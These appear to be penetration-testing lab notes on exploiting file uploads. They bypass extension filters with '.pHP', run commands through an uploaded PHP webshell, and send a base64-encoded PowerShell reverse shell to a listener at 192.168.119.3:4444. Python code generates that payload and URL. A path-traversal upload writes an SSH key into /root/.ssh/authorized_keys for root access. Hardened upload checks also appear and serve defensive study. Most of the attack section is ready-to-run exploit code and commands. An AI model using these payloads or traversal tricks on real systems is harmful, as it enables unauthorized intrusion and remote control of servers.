File upload

Using executable files

Bypass extension filters with an alternative PHP extension such as .phps instead of .php, or with mixed case such as .pHP. A blocklist that compares the extension case-sensitively rejects .php but lets .pHP through, while the web server still maps the file to the PHP handler and executes it.
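An added example, not code from these notes, of the kind of server-side check the mixed-case and alternate-extension tricks defeat: a case-sensitive blocklist beside a hardened allowlist check, run over constructed filenames. The extension sets, the stem pattern and the function names are assumptions for illustration.

```python
# Added example, not code from the original notes. Constructed filenames are
# passed through a naive blocklist (vulnerable) and an allowlist (hardened);
# the extension sets below are illustrative assumptions.
import os
import re

BLOCKED_EXTENSIONS = {".php"}            # what the naive handler tries to stop


def naive_blocklist_allows(filename: str) -> bool:
    """Vulnerable check: exact, case-sensitive suffix match against a blocklist.

    'simple-backdoor.pHP' and 'simple-backdoor.phps' are not in the set, so
    they pass, although the web server may still route them to the PHP
    interpreter.
    """
    _, ext = os.path.splitext(filename)
    return ext not in BLOCKED_EXTENSIONS


ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".txt"}
_SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def hardened_allows(filename: str) -> bool:
    """Hardened check: allowlist only, compared case-insensitively, exactly one
    extension, no path separators or NUL bytes, restricted characters in the stem.

    Rejects mixed case ('.pHP'), variant extensions such as '.phps', double
    extensions ('shell.php.jpg'), trailing dots and anything carrying a path.
    """
    if "/" in filename or "\\" in filename or "\x00" in filename:
        return False
    parts = filename.split(".")
    if len(parts) != 2:
        return False
    stem, ext = parts
    return bool(_SAFE_STEM.match(stem)) and "." + ext.lower() in ALLOWED_EXTENSIONS


def compare(filenames):
    """Return {name: (naive_result, hardened_result)} for a list of names."""
    return {f: (naive_blocklist_allows(f), hardened_allows(f)) for f in filenames}


if __name__ == "__main__":
    samples = ["simple-backdoor.php", "simple-backdoor.pHP",
               "simple-backdoor.phps", "shell.php.jpg", "photo.JPG"]
    for name, (naive, hard) in compare(samples).items():
        print(f"{name:24} blocklist={naive!s:5} allowlist={hard}")
```

The allowlist is the part that matters: once only a fixed set of lower-cased extensions is accepted, case tricks and extension variants stop being a question of how complete the blocklist is. Content inspection (magic bytes) and storing the file under a server-generated name belong on top of this, not instead of it.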

{% code title="Execution of dir command in the uploaded webshell" overflow="wrap" lineNumbers="true" %}

curl 'http://192.168.50.189/meteor/uploads/simple-backdoor.pHP?cmd=dir'

{% endcode %}

{% code title="Starting netcat listener on port 4444" overflow="wrap" lineNumbers="true" %}

nc -nvlp 4444

{% endcode %}

{% code title="Encoding the oneliner in PowerShell on Linux" overflow="wrap" lineNumbers="true" %}

kali@kali:~$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

PS> $Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'


PS> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

PS> $EncodedText =[Convert]::ToBase64String($Bytes)

PS> $EncodedText
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0
...
AYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA


PS> exit

{% endcode %}

{% code title="Using curl to send the base64 encoded reverse shell oneliner" overflow="wrap" lineNumbers="true" %}

curl 'http://192.168.50.189/meteor/uploads/simple-backdoor.pHP?cmd=powershell%20-enc%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0
...
AYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA'

{% endcode %}
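An added example, not code from these notes, that produces the same `-enc` payload without a local pwsh: PowerShell's `-EncodedCommand` expects base64 over the UTF-16LE ("Unicode") bytes of the script, which is why a plain `base64` of UTF-8 text is rejected. It reuses the listener address, port and webshell URL from these notes; the function names are mine.

```python
# Added example, not code from the original notes. Builds the reverse-shell
# one-liner used in these notes, encodes it the way `powershell -enc` expects
# (base64 of UTF-16LE), and URL-encodes it into the webshell query string.
import base64
from urllib.parse import quote

LHOST, LPORT = "192.168.119.3", 4444                       # listener from the notes
WEBSHELL = "http://192.168.50.189/meteor/uploads/simple-backdoor.pHP"


def reverse_shell_script(lhost: str, lport: int) -> str:
    """The TCP reverse-shell one-liner from the notes with host/port filled in."""
    return (
        f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});'
        '$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};'
        'while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;'
        '$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);'
        '$sendback = (iex $data 2>&1 | Out-String );'
        '$sendback2 = $sendback + "PS " + (pwd).Path + "> ";'
        '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);'
        '$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
    )


def encode_for_powershell(script: str) -> str:
    """UTF-16LE without BOM, then base64: the exact input -EncodedCommand wants."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded: str) -> str:
    """Reverse of encode_for_powershell, handy for checking a captured payload."""
    return base64.b64decode(encoded).decode("utf-16-le")


def webshell_url(shell: str, command: str) -> str:
    """Percent-encode the whole command so spaces and any '+', '/' or '=' in the
    base64 survive the query string instead of being reinterpreted by the server."""
    return f"{shell}?cmd={quote(command, safe='')}"


if __name__ == "__main__":
    encoded = encode_for_powershell(reverse_shell_script(LHOST, LPORT))
    print(encoded)
    print(webshell_url(WEBSHELL, f"powershell -enc {encoded}"))
```

The output starts with the same `JABjAGwAaQBlAG4AdAAgAD0AIABO...` as the pwsh session above; decoding it back with `decode_powershell` is a quick sanity check when a payload sent through a webshell comes back with a syntax error.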

Using non-executable files

{% hint style="info" %} When testing a file upload form, always check what happens when the same file is uploaded twice. If the application reports that the file already exists, that response can be used to enumerate files already present on the web server by uploading candidate names. If it returns an error message instead, the message may reveal the programming language or web technologies in use. {% endhint %}

Intercept the upload in Burp and change the filename parameter to ../../../../../../../test.txt. If the handler honours the traversal, the file lands outside the upload directory (check for test.txt in the web root or elsewhere) and the same trick can write to any path the web server can write.

{% code title="Prepare authorized_keys file for File Upload" overflow="wrap" lineNumbers="true" %}

kali@kali:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileup
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in fileup
Your public key has been saved in fileup.pub
...

kali@kali:~$ cat fileup.pub > authorized_keys

{% endcode %}

Change the filename to ../../../../../../../root/.ssh/authorized_keys. This only works if the upload handler runs with write access to /root/.ssh, and it replaces any authorized_keys already there.

Then SSH in as root with the matching private key (fileup).
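An added example, not code from these notes, showing both ends of the traversal step above: the multipart body in which the edited filename travels, and the server-side path handling that decides where the file lands, vulnerable form beside the hardened one. The upload directory, field name, boundary and key material are constructed for illustration; nothing is written to disk.

```python
# Added example, not code from the original notes. Shows the multipart request a
# Burp-edited filename produces and the server-side join that either honours or
# neutralises the '..' segments. Paths and sample data are constructed.
import posixpath
from typing import Optional, Tuple

UPLOAD_DIR = "/var/www/html/meteor/uploads"                  # assumed upload directory
TRAVERSAL = "../../../../../../../root/.ssh/authorized_keys"   # filename from the notes


def unsafe_destination(upload_dir: str, filename: str) -> str:
    """Vulnerable: joins the client-supplied filename as-is, so '..' segments
    walk out of the upload directory (extra '..' past '/' are simply dropped)."""
    return posixpath.normpath(posixpath.join(upload_dir, filename))


def safe_destination(upload_dir: str, filename: str) -> Optional[str]:
    """Hardened: keep only the last path component, reject empty/dot names, then
    verify the resolved path is still under the upload directory. None = reject."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if base in ("", ".", "..") or base.startswith("."):
        return None
    root = posixpath.normpath(upload_dir)
    dest = posixpath.normpath(posixpath.join(root, base))
    if posixpath.commonpath([root, dest]) != root:   # defence in depth
        return None
    return dest


def build_multipart(field: str, filename: str, data: bytes,
                    boundary: str = "----boundary1234") -> Tuple[str, bytes]:
    """Return (Content-Type header value, request body) for a single-file upload.
    The filename= parameter of Content-Disposition is the value edited in Burp."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + data + tail


if __name__ == "__main__":
    pubkey = b"ssh-rsa AAAAB3NzaC1yc2E...constructed... kali@kali\n"  # placeholder key
    content_type, body = build_multipart("file", TRAVERSAL, pubkey)
    print(content_type)
    print(body.decode(errors="replace"))
    print("vulnerable handler writes to:", unsafe_destination(UPLOAD_DIR, TRAVERSAL))
    print("hardened handler writes to:  ", safe_destination(UPLOAD_DIR, TRAVERSAL))
```

With the vulnerable join the file resolves to /root/.ssh/authorized_keys; with the hardened one the same request stores authorized_keys inside the upload directory, which is harmless. A handler that ignores the client name entirely and writes under a server-generated name does not need the containment check at all.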